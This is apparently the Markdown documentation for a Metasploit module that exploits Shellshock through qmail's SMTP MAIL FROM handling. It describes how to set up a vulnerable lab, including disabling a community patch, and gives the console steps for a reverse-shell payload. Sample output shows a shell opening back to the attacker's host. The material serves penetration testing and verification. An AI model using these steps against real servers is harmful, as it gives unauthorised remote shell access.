83 lines
3.1 KiB
Markdown
83 lines
3.1 KiB
Markdown
|
## Vulnerable Application
|
||
|
|
|
||
|
|
Any qmail version (works on latest versions, qmail-1.03 and netqmail-1.06) running on a system with a vulnerable BASH (Shellshock). In order to execute code, /bin/sh has to be linked to bash (usually default configuration) and a valid recipient must be set on the RCPT TO field (usually admin@exampledomain.com). The exploit does not work on the "qmailrocks" community version as it ensures the MAILFROM field is well-formed.
|
||
|
|
|
||
|
|
## Setting up a vulnerable environment
|
||
|
|
|
||
|
|
Install Qmail on a Linux server with a shellshock vulnerable bash. Ensure that /bin/sh is linked to bash. Create an e-mail account on that qmail server. IMPORTANT: there is a community version of qmail, "qmailrocks" (http://qmailrocks.thibs.com/) which apply a patch that checks the vulnerable MAILFROM parameter. This version (with the patch applied) is NOT vulnerable. If you are using this version, change the "int mfcheck()" function on qmail-smtpd.c and ensure it returns always 0 (after applying the patch) and re-compile qmail-smtpd.
|
||
|
|
|
||
|
|
## Verification Steps
|
||
|
|
|
||
|
|
1. `use exploit/unix/smtp/qmail_bash_env_exec`
|
||
|
|
2. `set RHOST <target IP>`
|
||
|
|
3. `set MAILTO <valid e-mail recipient>`
|
||
|
|
4. `set payload cmd/unix/reverse`
|
||
|
|
5. `set LHOST <local IP>`
|
||
|
|
7. optionally set `RPORT` and `LPORT`
|
||
|
|
8. `exploit`
|
||
|
|
9. **Verify** a new shell session is started
|
||
|
|
|
||
|
|
## Options
|
||
|
|
|
||
|
|
**MAILTO**
|
||
|
|
|
||
|
|
A valid e-mail recipient. Usually, admin@targetdomain.com can be used.
|
||
|
|
|
||
|
|
## Sample Output
|
||
|
|
**Tested on qmail-1.03 on Debian 6.0.6 (squeeze). BASH version 4.1.5(1).**
|
||
|
|
|
||
|
|
```
|
||
|
|
msf > use exploit/unix/smtp/qmail_bash_env_exec
|
||
|
|
msf exploit(qmail_bash_env_exec) > set rhost 192.168.1.113
|
||
|
|
rhost => 192.168.1.113
|
||
|
|
msf exploit(qmail_bash_env_exec) > set mailto "admin@testqmail2.test"
|
||
|
|
mailto => admin@testqmail2.test
|
||
|
|
msf exploit(qmail_bash_env_exec) > set payload cmd/unix/reverse
|
||
|
|
payload => cmd/unix/reverse
|
||
|
|
msf exploit(qmail_bash_env_exec) > show options
|
||
|
|
|
||
|
|
Module options (exploit/unix/smtp/qmail_bash_env_exec):
|
||
|
|
|
||
|
|
Name Current Setting Required Description
|
||
|
|
---- --------------- -------- -----------
|
||
|
|
MAILTO admin@testqmail2.test yes TO address of the e-mail
|
||
|
|
RHOST 192.168.1.113 yes The target address
|
||
|
|
RPORT 25 yes The target port (TCP)
|
||
|
|
|
||
|
|
|
||
|
|
Payload options (cmd/unix/reverse):
|
||
|
|
|
||
|
|
Name Current Setting Required Description
|
||
|
|
---- --------------- -------- -----------
|
||
|
|
LHOST 192.168.1.102 yes The listen address
|
||
|
|
LPORT 4444 yes The listen port
|
||
|
|
|
||
|
|
|
||
|
|
Exploit target:
|
||
|
|
|
||
|
|
Id Name
|
||
|
|
-- ----
|
||
|
|
0 Automatic
|
||
|
|
|
||
|
|
|
||
|
|
msf exploit(qmail_bash_env_exec) > run
|
||
|
|
|
||
|
|
[*] Started reverse TCP double handler on 192.168.1.102:4444
|
||
|
|
[*] 192.168.1.113:25 - Sending the payload...
|
||
|
|
[*] 192.168.1.113:25 - Sending RCPT TO admin@testqmail2.test
|
||
|
|
[*] Accepted the first client connection...
|
||
|
|
[*] Accepted the second client connection...
|
||
|
|
[*] Command: echo RvZfov9i2ZuveLXA;
|
||
|
|
[*] Writing to socket A
|
||
|
|
[*] Writing to socket B
|
||
|
|
[*] Reading from sockets...
|
||
|
|
[*] Reading from socket B
|
||
|
|
[*] B: "RvZfov9i2ZuveLXA\r\n"
|
||
|
|
[*] Matching...
|
||
|
|
[*] A is input...
|
||
|
|
[*] Command shell session 19 opened (192.168.1.102:4444 -> 192.168.1.113:48167) at 2017-05-04 15:11:02 +0200
|
||
|
|
|
||
|
|
whoami
|
||
|
|
vpopmail
|
||
|
|
```
|